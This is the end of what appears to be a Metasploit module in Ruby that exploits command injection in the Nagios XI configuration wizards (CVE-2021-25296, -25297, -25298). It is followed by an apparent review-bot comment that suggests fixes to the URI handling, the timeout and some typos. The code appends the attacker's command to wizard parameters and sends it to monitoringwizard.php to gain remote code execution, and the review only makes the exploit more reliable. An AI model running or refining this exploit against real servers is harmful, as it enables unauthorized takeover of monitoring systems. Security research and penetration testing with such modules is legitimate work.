if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
|
||||
nagios_version = '1.0.0'
|
||||
end
|
||||
@version = Rex::Version.new(nagios_version)
|
||||
|
||||
return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
|
||||
end
|
||||
|
||||
def check
|
||||
# Authenticate to ensure we can access the NagiosXI version
|
||||
auth_result, err_msg = authenticate
|
||||
case auth_result
|
||||
when 1
|
||||
return CheckCode::Unknown(err_msg)
|
||||
when 2, 4, 5, 6
|
||||
return CheckCode::Detected(err_msg)
|
||||
when 3
|
||||
return CheckCode::Safe(err_msg)
|
||||
end
|
||||
|
||||
if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5')
|
||||
return CheckCode::Appears
|
||||
end
|
||||
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
def execute_command(cmd, _opts = {})
|
||||
if !@nsp || !@auth_cookies # Check to see if we already authenticated during the check
|
||||
auth_result, err_msg = authenticate
|
||||
case auth_result
|
||||
when 1
|
||||
fail_with(Failure::Disconnected, err_msg)
|
||||
when 2, 4, 5, 6
|
||||
fail_with(Failure::UnexpectedReply, err_msg)
|
||||
when 3
|
||||
fail_with(Failure::NotVulnerable, err_msg)
|
||||
end
|
||||
end
|
||||
|
||||
# execute payload based on the selected targeted configuration wizard
|
||||
url_params = {
|
||||
'update' => 1,
|
||||
'nsp' => @nsp
|
||||
}
|
||||
# After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298
|
||||
# changes from address to ip_address
|
||||
if @version <= Rex::Version.new('5.5.7')
|
||||
address_param = 'address'
|
||||
else
|
||||
address_param = 'ip_address'
|
||||
end
|
||||
|
||||
# CVE-2021-25296 affects the windowswmi configuration wizard.
|
||||
if datastore['TARGET_CVE'] == 'CVE-2021-25296'
|
||||
url_params = url_params.merge({
|
||||
'nextstep' => 3,
|
||||
'wizard' => 'windowswmi',
|
||||
'ip_address' => Array.new(4) { rand(256) }.join('.'),
|
||||
'domain' => Rex::Text.rand_text_alphanumeric(7..15),
|
||||
'username' => Rex::Text.rand_text_alphanumeric(7..20),
|
||||
'password' => Rex::Text.rand_text_alphanumeric(7..20),
|
||||
'plugin_output_len' => Rex::Text.rand_text_numeric(5) + "; #{cmd};"
|
||||
})
|
||||
# CVE-2021-25297 affects the switch configuration wizard.
|
||||
elsif datastore['TARGET_CVE'] == 'CVE-2021-25297'
|
||||
url_params = url_params.merge({
|
||||
'nextstep' => 3,
|
||||
'wizard' => 'switch',
|
||||
address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};",
|
||||
'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15),
|
||||
'scaninterfaces' => 'on'
|
||||
})
|
||||
# CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by
|
||||
# specifying the digitalocean option for the wizard parameter.
|
||||
elsif datastore['TARGET_CVE'] == 'CVE-2021-25298'
|
||||
url_params = url_params.merge({
|
||||
address_param => Array.new(4) { rand(256) }.join('.') + "; #{cmd};",
|
||||
'nextstep' => 4,
|
||||
'wizard' => 'digitalocean'
|
||||
})
|
||||
else
|
||||
fail_with(Failure::BadConfig, 'Invalid TARGET_CVE: Choose CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298.')
|
||||
end
|
||||
|
||||
print_status('Sending the payload...')
|
||||
# Send the final request. Note that the target is not expected to respond if we get
|
||||
# code execution. Therefore, we set the timeout on this request to 0.
|
||||
send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/nagiosxi/config/monitoringwizard.php',
|
||||
'cookie' => @auth_cookies,
|
||||
'vars_get' => url_params
|
||||
})
|
||||
end
|
||||
|
||||
def exploit
|
||||
if target.arch.first == ARCH_CMD
|
||||
execute_command(payload.encoded)
|
||||
else
|
||||
execute_cmdstager(background: true)
|
||||
end
|
||||
end
|
||||
end
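Review bot: `execute_command` hardcodes `'uri' => '/nagiosxi/config/monitoringwizard.php'`, so the TARGETURI option the module exposes (default `/nagiosxi/`, "The base path to the Nagios XI application") is ignored and the request goes to the wrong path on any instance served under a different base; build the URI with `normalize_uri(target_uri.path, 'config', 'monitoringwizard.php')` instead. The comment above `send_request_cgi` says the request timeout is set to 0 because the target is not expected to respond once the command runs, but the call passes no `'timeout'` key, so either add it or correct the comment. The windowswmi branch also hardcodes the `'ip_address'` key while the switch and cloud-vm branches use `address_param`; if the 5.5.7-and-prior rename to `address` applies to that wizard too, use `address_param` there as well. Typos: the 'Name' string reads "Remote Code Exection" (should be "Execution") and the comment on `handle_unsigned_license` reads "a status code an a error message" (should be "and an error message").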